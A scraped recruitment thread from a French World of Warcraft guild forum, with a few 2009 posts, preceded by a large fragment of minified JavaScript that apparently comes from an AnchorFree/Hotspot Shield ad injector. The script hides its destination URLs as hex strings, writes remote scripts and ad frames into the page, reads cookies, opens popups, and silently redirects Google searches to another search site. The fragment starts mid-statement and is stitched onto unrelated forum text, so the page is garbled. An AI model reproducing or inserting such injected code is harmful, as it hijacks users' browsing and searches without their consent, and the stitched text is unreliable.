');document.onkeydown=_AF$.keyPress;_AF$['CLS']=('<span class="AFc_all" onclick="_AF$.clsBtn();return false;" onmouseover="this.style.color=\'red\'" onmouseout="this.style.color=\'#000\'" id="AFi_ClA'+_AF$.RN+'" style="color:#000;height:12px;font-family:verdana,arial,tahoma;width:12px;line-height:0.7;font-weight:bolder;background-color:#fff;float:right;cursor:hand;cursor:pointer;margin:0;border:0;padding:0;" alt="close" title="Close this ad." >x</span>')}switch(_AF$.AD.DIM){case 100:if(_AF$.AD.A=='ask'){if(_AF$.wIW>970&&_AF$.wIW<1035){_AF$.OUTPUT+=(_AF$['LGO'])}else if(_AF$.wIW>820&&_AF$.wIW<970){_AF$.CLS+=_AF$['SHR']}else if(_AF$.wIW>1035){_AF$.OUTPUT+=(_AF$['LGO']);_AF$.CLS+=_AF$['SHR']}_AF$.OUTPUT+=('
'+_AF$.ADFRAME+'
'+_AF$.CLS)}else{_AF$.OUTPUT+=('
');_AF$.OUTPUT+=('
'+_AF$.ADFRAME+'
'+_AF$.CLS+'
')}break;case 11:var ve_publisher="anchorfree",ve_site="anchorfree",ve_area="anchorfree",ve_width=728,ve_height=90,ve_alternate=AFf_RNVEGG;_AF$.OUTPUT+=('
');if(_AF$.AD.A=='ask'){if(_AF$.wIW>970&&_AF$.wIW<1035){_AF$.OUTPUT+=(_AF$['LGO'])}else if(_AF$.wIW>820&&_AF$.wIW<970){_AF$.CLS+=_AF$['SHR']}else if(_AF$.wIW>1035){_AF$.OUTPUT+=(_AF$['LGO']);_AF$.CLS+=_AF$['SHR']}_AF$.OUTPUT+=('
');_AF$.OUTPUT+=('<iframe class="AFc_all'+_AF$.RN+'" name="'+_AF$.AD.ID+'" id="'+_AF$.AD.ID+'" style="display:none" src="about:blank" height="'+(_AF$.AD.HGHT-1)+'px" marginwidth="0" marginheight="0" vspace="0" hspace="0" frameborder="0" scrolling="no" width="100%"></iframe>');_AF$.OUTPUT+=("<scr"+"ipt src='http://core.videoegg.com/eap/html/js/init.js?"+Math.random()+"'></scr>");_AF$.OUTPUT+=('
'+_AF$.CLS)}else{_AF$.OUTPUT+=('
');_AF$.OUTPUT+=('
');_AF$.OUTPUT+=('<iframe class="AFc_all'+_AF$.RN+'" name="'+_AF$.AD.ID+'" id="'+_AF$.AD.ID+'" style="display:none" src="about:blank" height="'+(_AF$.AD.HGHT-1)+'px" marginwidth="0" marginheight="0" vspace="0" hspace="0" frameborder="0" scrolling="no" width="100%"></iframe>');_AF$.OUTPUT+=("<scr"+"ipt src='http://core.videoegg.com/eap/html/js/init.js?"+Math.random()+"'></scr>");_AF$.OUTPUT+=('
'+_AF$.CLS+'
')}break;case 30:if(_AF$.AD.A=='ask'){_AF$.OUTPUT+=('
'+_AF$.ADFRAME+'
');_AF$.OUTPUT+=(_AF$.CLS)}else{_AF$.OUTPUT+=('
'+_AF$.ADFRAME+'
');_AF$.OUTPUT+=('
');_AF$.OUTPUT+=('
'+_AF$.CLS+'

')}break;case 41:_AF$.OUTPUT+=('
'+_AF$.ADFRAME+'
');break};_AF$.OUTPUT+=('
');AFv_netCobj={};AFv_netCobj_ass=function(v,k){var k=k+'',v=v+'';k=k.replace(/^\s*|\s*$/g,'');v=v.replace(/^\s*|\s*$/g,'');AFv_netCobj[v]=(typeof(k)!='undefined'&&k!=''&&k!=null)?k:'';return};(function(){if(typeof(AFv_netC)=='undefined'){window.setTimeout(arguments.callee,200)}else if(AFv_netC==''||AFv_netC=='(null)'){delete(AFv_netC);return}else{var netC_arr=AFv_netC.split(';');for(var i=netC_arr.length;--i>=0Wink{if(netC_arr[i]!=''){var o_a=netC_arr[i].split('=');if(o_a[0]!=''&&o_a[0]!=null){AFv_netCobj_ass(o_a[0],o_a[1])}}}if(_AF$.AD.DIM!=41&&typeof(AFv_netCobj['AFSTPADS'])!='undefined'&&AFv_netCobj['AFSTPADS']>(new Date().getTime()-86400000)){_AF$.ON=0;_AF$.AD.A=false;AFf_niceRm()}if(_AF$.AD.K==true){var adlt=_$ina('p',_AF$.CT),dt=new Date().getTime();if(adlt==false&&typeof(AFv_netCobj['afsCSP'])!='undefined'){var arr=AFv_netCobj['afsCSP'].split('_'),ttv=1800000,lt=(!!arr[1])?(arr[1]*1):0;if((arr[0]=='0'&&(dt-lt)>ttv)){_AF$.ON=0;_AF$.AD.P=false;window.location=_AF$.AF+'api/clrdr2.php?cid=90&tm='+(new Date().getTime())+'&afurl='+document.URL._AFtoHex();return}}else if(adlt==true&&typeof(AFv_netCobj['afsAD'])!='undefined'){var arr=AFv_netCobj['afsAD'].split('_'),ttv=900000,lt=(!!arr[1])?(arr[1]*1):0,od=(!!arr[2]&&arr[2]=='a')?true:false;if((dt-lt)>ttv){_AF_PP(true,('687474703a2f2f626f782e616e63686f72667265652e6e65742f61646f6e5f61642e68746d6c3f7461673d'._AFtoStr())+_AF$.SN+'&afurl='+escape(document.URL))}}}if(_AF$.AD.S==true){(function(){if(window.location.hostname.indexOf('www.google.com')==-1){return}if(_AF$.REF.indexOf('ggcc2.html')!=-1||_AF$.REF.indexOf('ggcc.html')!=-1){return}if(typeof(AFv_netCobj['AFCNDT'])!='undefined'&&AFv_netCobj['AFCNDT']=='no'){return}var res_urr='687474703a2f2f7365617263682e686f7473706f74736869656c642e636f6d2f672f726573756c74732e7068703f72643d7264'._AFtoStr(),ind_urr='687474703a2f2f7365617263682e686f7473706f74736869656c642e636f6d2f672f3f72643d7264'._AFtoStr();if(_AF$.AD.A=='ask'||_AF$.CH=='HSSCNL000218'){res_urr='687474703a2f2f7365617263682e686f7473706f74736869656c642e636f6d2f612f726573756c74732e7068703f72643d7264'._AFtoStr();ind_urr='687474703a2f2f7365617263682e686f7473706f74736869656c642e636f6d2f612f3f72643d7264'._AFtoStr()}try{var gvl=new RegExp(/^http:\/\/www.google.com(\/search\?|\/webhp\?|\/firefox\?|\/$).*/gi).exec(unescape(window.location.href)),gq=new RegExp(/q=[^&]+/).exec(window.location.search);if(gvl!=null&&gq==null&&AFv_netCobj['AFCNDT']=='y'){window.location=ind_urr}else if(gvl!=null&&gq==null){var c=confirm('Hotspot Shield Alert: disable Google tracking?');if(c!=false){AFf_frSrc('AFt_afhf'+_AF$.RN,_AF$.AF+'ggccyes.php?y=y&cnl='+_AF$.CH+'&afurl='+document.URL._AFtoHex())}else{AFf_frSrc('AFt_afhf'+_AF$.RN,_AF$.AF+'ggccyes.php?n=n&afurl='+document.URL._AFtoHex())}}else if(gvl!=null&&gq!=null){var tmpgq=(gq+'').replace(/ /g,'+');if(typeof(AFv_netCobj['AFCNDTQ'])!='undefined'&&('q='+AFv_netCobj['AFCNDTQ'])==tmpgq){return}else{window.location=res_urr+'&'+gq}}}catch(e){}})()}if(_AF$.AD.P==true){if(typeof(AFv_netCobj['af_PP3'])!='undefined'&&AFv_netCobj['af_PP3']=='run'){_AF_PP(true,('687474703a2f2f626f782e616e63686f72667265652e6e65742f70706f642e68746d6c3f'._AFtoStr())+'tag='+_AF$.SN+'&cat='+_AF$.CT+'&cnl='+_AF$.CH+'&afurl='+escape(document.URL))}else if(_$ina('I',_AF$.CT)==true&&typeof(AFv_netCobj['af_PP'])!='undefined'&&AFv_netCobj['af_PP']=='run'){_AF_PP(true,('687474703a2f2f626f782e616e63686f72667265652e6e65742f61646f6e2e68746d6c3f7461673d'._AFtoStr())+_AF$.SN+'&afurl='+escape(document.URL))}else if((_$ina('C',_AF$.CT)==true||_$ina('f',_AF$.CT)==true||_$ina('11F',_AF$.CT)==true||_$ina('U',_AF$.CT)==true||_$ina('o',_AF$.CT)==true||_$ina('1F',_AF$.CT)==true)&&typeof(AFv_netCobj['af_PP2'])!='undefined'&&AFv_netCobj['af_PP2']=='run'){_AF_PP(true,('687474703a2f2f626f782e616e63686f72667265652e6e65742f62616e6e6572636f6e6e6563742e68746d6c3f7461673d'._AFtoStr())+_AF$.SN+'&afurl='+escape(document.URL))}}}delete(AFv_netC)})();(function(){_AF$['ADSRC']='';document.write(_AF$.OUTPUT);switch(_AF$.AD.DIM){case 30:_AF$['ADSRC']=_AF$.VRS+'?#tag='+_AF$.SN+'&sip='+_AF$.IP+'&cnl='+_AF$.CH+'&w=468&h=60&type=c';break;case 41:_AF$.AD.A=true;_AF$.CT='99999';_AF$['ADSRC']=_AF$.VRS+'?#type=ask&tag='+_AF$.SN+'&sip='+_AF$.IP+'&cnl='+_AF$.CH;break;case 100:_AF$['ADSRC']=_AF$.VRS+'?#tag='+_AF$.SN+'&sip='+_AF$.IP+'&cnl='+_AF$.CH;break};if(_AF$.AD.A!=false||_AF$.AD.DIM==41){if(_AF$.ADSRC!=''){AFf_frSrc(_AF$.AD.ID,_AF$.ADSRC+'&cat='+_AF$.CT+_AF$.URR+_AF$.RFR)}_AF$['BOX']=new AFf_Box();_AF$.BOX.dr()}document.write('<scr'+'ipt type="text/javascript" src="'+_AF$.AF+'cinj.php?t='+_AF$.STT+'"></scr>');_AF$['TTL']=document.title;_AF$['INTV']=window.setInterval(function(){if(_AF$.ON==0||_AF$.ADSRC==''){window.clearInterval(_AF$.INTV)}try{if(_AF$.TTL!=document.title){_AF$.TTL=document.title;AFf_frSrc(_AF$.AD.ID,_AF$.ADSRC+'&cat='+_AF$.CT+_AF$.URR+_AF$.RFR)}}catch(e){window.clearInterval(_AF$.INTV)}},200000);if(_$ina('1',_AF$.CT)||_$ina('0',_AF$.CT)){AFf_DOM('AFpre.pos()')}if(_AF$.AD.C==true){AFf_DOM('AFf_Pr.init()')}})()}else{_AF$.CT+=',HID';_AFimgStat(0);AFv_netC='';if(typeof(AFv_netCobj)=='undefined'){AFv_netCobj={}}_$id('AFt_afhf'+_AF$.RN).style.display='block';AFf_frSrc('AFt_afhf'+_AF$.RN,_AF$.VRS+'?#cat=99999&tag='+_AF$.SN+'&sip='+_AF$.IP+'&cnl='+_AF$.CH+_AF$.URR+_AF$.RFR)}}
-1 

primo on recrute pa a base  amitié avec qlq uns de la guilde

secondo  c'est quoi ca : une expresion-ecrite ?

Sam 17 Oct - 19:58 (2009)
Tasha

ofét jé aprie a aimer ton nom Okay

Lun 9 Nov - 23:06 (2009)
Contenu Sponsorisé

Message HaYaWaN

Aujourd’hui à 20:53 (2018)
Répondre au sujet    Guilde avensis northrend Index du Forum » » Recrutement Toutes les heures sont au format GMT + 2 Heures
Page 1 sur 1

Sauter vers: 

Portail | Index | Panneau d’administration | creer un forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation